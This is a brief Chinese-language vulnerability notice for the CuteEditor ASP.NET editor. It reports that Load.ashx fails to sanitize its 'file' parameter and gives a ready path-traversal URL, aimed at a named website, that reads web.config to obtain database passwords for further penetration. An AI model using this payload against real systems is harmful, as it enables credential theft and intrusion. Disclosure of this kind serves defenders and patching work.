漏洞描述
CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。 CuteEditor可以帮助Asp.net开发者轻松的对原来文本框(Textarea)中的内容(包括文字、图片等Html内容)进行编辑,更重要得是这些内容编辑的实现是所见即所得方式。 CuteEditor还集成了文件(包括图片、文档等)上传、媒体(包括视频、声音等)文件直接插入等对你来说非常实用的功能模块。但是在 Load.ashx 文件中,未对 file 参数进行处理,可以加载任意文件。
利用方法
http://www.woyigui.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
使用该方法,读取应用系统中,包含数据库连接密码的文件,从而进一步渗透。